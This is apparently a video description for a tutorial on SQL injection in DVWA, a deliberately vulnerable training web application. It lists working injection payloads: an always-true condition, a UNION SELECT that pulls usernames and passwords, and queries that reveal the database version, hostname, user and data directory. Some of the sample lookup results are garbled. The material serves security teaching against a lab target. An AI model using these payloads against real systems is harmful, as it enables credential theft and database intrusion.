SQL Injection in DVWA || SQL Injection - Damn Vulnerable Web Application (DVWA)

Опубликовано: 11 Март 2026
на канале: Cyber Security
10,005
88

In this video we will talk about:-
How to do SQL Injection in DVWA?

Basic Injection:
identity=2 — First call: Gordon, Surname: Brown
identification=3 — First name: Hack, Surname: Me
identity=four — First name: Pablo, Surname: Picasso
identification=5 — First name: Bob, Surname: Smith

Always True Scenario:
' OR '' = '

Extract password
' UNION SELECT user, password FROM users--

version of database
' union select 1,@@version#

Hostname
' union select null,@@hostname #

current database
' union all select system_user(),user() #

Database Name
' union select null,database() #

location of the database
' union select null,@@datadir #



You can follow me on:
Telegram:-
Offcampus Drive( Placement & Internships only)
https://t.me/placement_drive
linkedin:
  / baboolal-yadav-a50237172  
Github:
https://github.com/Baboo381
twitter:
  / roy_baboolal